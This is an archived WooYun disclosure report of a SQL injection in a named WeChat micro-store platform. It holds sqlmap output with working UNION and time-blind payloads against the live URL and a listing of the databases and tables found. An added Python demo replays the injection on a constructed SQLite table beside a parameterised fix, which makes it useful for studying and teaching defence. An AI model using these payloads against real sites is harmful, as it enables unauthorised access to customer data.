WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --------http://drop.zone.ci/
2015-02-27: Details sent to the vendor, awaiting the vendor's handling
2015-02-28: Vendor has confirmed; details disclosed to the vendor only
2015-03-10: Details disclosed to core white hats and experts in the relevant field
2015-03-20: Details disclosed to regular white hats
2015-03-30: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public
The WeChat micro-distribution platform run by Qibo Technology (启博科技) has a SQL injection vulnerability. Over a thousand micro-stores are hosted on this platform, so a large amount of their data is exposed.
Straight to the injection point: http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html. The platform uses pseudo-static (rewritten) URLs; the injection is in the id path segment.
sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: http://m.wifenxiao.com:80/Item/detail/id/-3294) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d6d7671,0x6245564566716c587659,0x71676b6671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#/sid/446/pid/0.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://m.wifenxiao.com:80/Item/detail/id/5750) AND SLEEP(5) AND (1633=1633/sid/446/pid/0.html
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [6]:
[*] information_schema
[*] micro_fenxiao
[*] mysql
[*] performance_schema
[*] test
[*] www_wifenxiao_com

Database: micro_fenxiao
[94 tables]
+---------------------------+
| tp_1688                   |
| tp_account                |
| tp_acp_config             |
| tp_admin                  |
| tp_admin_group            |
| tp_agent                  |
| tp_agent_apply            |
| tp_agent_rank             |
| tp_ali1688_category       |
| tp_api_client             |
| tp_apply_withdraw_deposit |
| tp_area                   |
| tp_auto_reply             |
| tp_cart                   |
| tp_category               |
| tp_category_img           |
| tp_category_magazine      |
| tp_checkin_rule           |
| tp_city                   |
| tp_code                   |
| tp_collection             |
| tp_commission_log         |
| tp_commission_rank        |
| tp_complain_item          |
| tp_complain_order         |
| tp_config                 |
| tp_country                |
| tp_coupon                 |
| tp_custom_module          |
| tp_file                   |
| tp_follow                 |
| tp_freight_tpl            |
| tp_game                   |
| tp_game_prize             |
| tp_gift                   |
| tp_group                  |
| tp_item                   |
| tp_item_group             |
| tp_item_message           |
| tp_magazine               |
| tp_magazine_category      |
| tp_mass_send              |
| tp_mass_send_view         |
| tp_material_content       |
| tp_material_more          |
| tp_material_one           |
| tp_message                |
| tp_message_user           |
| tp_order                  |
| tp_order_del_log          |
| tp_order_import_log       |
| tp_order_item             |
| tp_order_show             |
| tp_page_design            |
| tp_point_log              |
| tp_property               |
| tp_property_value         |
| tp_province               |
| tp_province_freight       |
| tp_pub_weixin             |
| tp_pub_weixin_user        |
| tp_pv                     |
| tp_qfx_shop               |
| tp_rank_privilege         |
| tp_seller                 |
| tp_shipping_print_item    |
| tp_shipping_print_set     |
| tp_shop                   |
| tp_shop_balance           |
| tp_sku                    |
| tp_sms_recharge_pro       |
| tp_sms_recharge_record    |
| tp_sms_record             |
| tp_stores                 |
| tp_system_call            |
| tp_taobao_props           |
| tp_tb_cat                 |
| tp_tb_property            |
| tp_tb_property_value      |
| tp_tb_shop                |
| tp_template               |
| tp_user                   |
| tp_user_account           |
| tp_user_address           |
| tp_user_balance           |
| tp_user_checkin           |
| tp_user_checkin_rule      |
| tp_user_coupon            |
| tp_user_game              |
| tp_user_gift              |
| tp_user_group             |
| tp_user_rank              |
| tp_version                |
| tp_visit_log              |
+---------------------------+

Database: www_wifenxiao_com
[22 tables]
+---------------------+
| wi_address_area     |
| wi_address_city     |
| wi_address_province |
| wi_article_content  |
| wi_article_sort     |
| wi_column           |
| wi_column_banner    |
| wi_column_user      |
| wi_config           |
| wi_config_user      |
| wi_domain           |
| wi_down_content     |
| wi_down_sort        |
| wi_job_content      |
| wi_link_content     |
| wi_link_sort        |
| wi_logs             |
| wi_online           |
| wi_pic_content      |
| wi_pic_sort         |
| wi_users            |
| wi_users_group      |
+---------------------+
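The report quotes the sqlmap findings without saying what the two payloads actually do. The Python script below is an added example; it is not part of the original report and not the vendor's code. It decodes the hex marker inside the quoted UNION payload, parses a pseudo-static route of the same shape as the target URL, and replays the injection against a constructed in-memory SQLite table whose lookup interpolates the route value into a parenthesised WHERE clause (the leading ")" in both payloads closes exactly such a parenthesis), next to the parameterised fix. The table "item", its three columns and the sample rows are invented for the demo; the real query had 19 columns and ran on MySQL, where sqlmap terminated with "#", which SQLite does not accept, so "--" stands in for it here.

```python
import re
import sqlite3

# UNION payload copied verbatim from the sqlmap output in the report
# (only the id segment of the URL).
PAGE_PAYLOAD = ("-3294) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,"
                "CONCAT(0x716d6d7671,0x6245564566716c587659,0x71676b6671),"
                "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#")


def decode_hex_markers(payload):
    """sqlmap injects CONCAT(prefix, random_token, suffix) as MySQL hex literals
    into one column at a time and looks for prefix+token+suffix in the reply;
    wherever it appears, that column is echoed into the page. Returns the
    three decoded strings."""
    return tuple(bytes.fromhex(h).decode("ascii")
                 for h in re.findall(r"0x([0-9a-fA-F]+)", payload))


def parse_pseudostatic(path):
    """ThinkPHP-style PATHINFO routing: /Module/action/k1/v1/k2/v2.html.
    Everything after module and action is key/value pairs; nothing here
    constrains the values to digits, which is how a payload reaches SQL."""
    segments = re.sub(r"\.html$", "", path).strip("/").split("/")
    pairs = segments[2:]
    return dict(zip(pairs[0::2], pairs[1::2]))


def make_db():
    """Constructed sample data; the real tp_item table is not reproduced."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (id INTEGER, title TEXT, price REAL)")
    conn.executemany("INSERT INTO item VALUES (?, ?, ?)",
                     [(11849, "sample product", 9.9), (5750, "other product", 19.0)])
    return conn


def vulnerable_lookup(conn, id_value):
    """The flawed pattern (assumed, to match the payload shape): the route value
    is interpolated into SQL inside parentheses. The payload's leading ')'
    closes that parenthesis and '--' (MySQL: '#') comments out the one the
    template appends."""
    sql = "SELECT id, title, price FROM item WHERE (id = %s)" % id_value
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, id_value):
    """Fix: reject anything but an unsigned integer, then bind the value."""
    if not re.fullmatch(r"\d+", id_value):
        raise ValueError("id must be an unsigned integer")
    return conn.execute("SELECT id, title, price FROM item WHERE id = ?",
                        (int(id_value),)).fetchall()


def find_marker(body, prefix, suffix):
    """The check sqlmap performs on the HTTP response: return the token found
    between prefix and suffix, or None if the column is not reflected."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body)
    return m.group(1) if m else None


def replay_union():
    """Rebuild the page's payload for the 3-column SQLite table, run it through
    the vulnerable handler and recover the token the way sqlmap would."""
    prefix, token, suffix = decode_hex_markers(PAGE_PAYLOAD)
    payload = ("-3294) UNION ALL SELECT NULL, '%s' || '%s' || '%s', NULL --"
               % (prefix, token, suffix))
    rows = vulnerable_lookup(make_db(), payload)
    html = "<h1>%s</h1>" % rows[0][1]      # the app renders column 2 as the title
    return find_marker(html, prefix, suffix)


if __name__ == "__main__":
    print(decode_hex_markers(PAGE_PAYLOAD))
    print(parse_pseudostatic("/Item/detail/id/11849/sid/1005/pid/0.html"))
    print(replay_union())
```

The three hex literals decode to "qmmvq", "bEVEfqlXvY" and "qgkfq": a random token fenced by two random delimiters, so a match in the response cannot be a coincidence. The second payload, 5750) AND SLEEP(5) AND (1633=1633, is built on the same assumption about the query: it closes the template's parenthesis and reopens one so the trailing ")" still balances, and the five-second delay is the only signal. The digits-only check in hardened_lookup rejects both payloads before any SQL is built.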
I only dumped part of the table names and went no further.
Happy New Year! How about a small gift?
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-02-28 09:17
Thank you for your help; we will fix this promptly!
None yet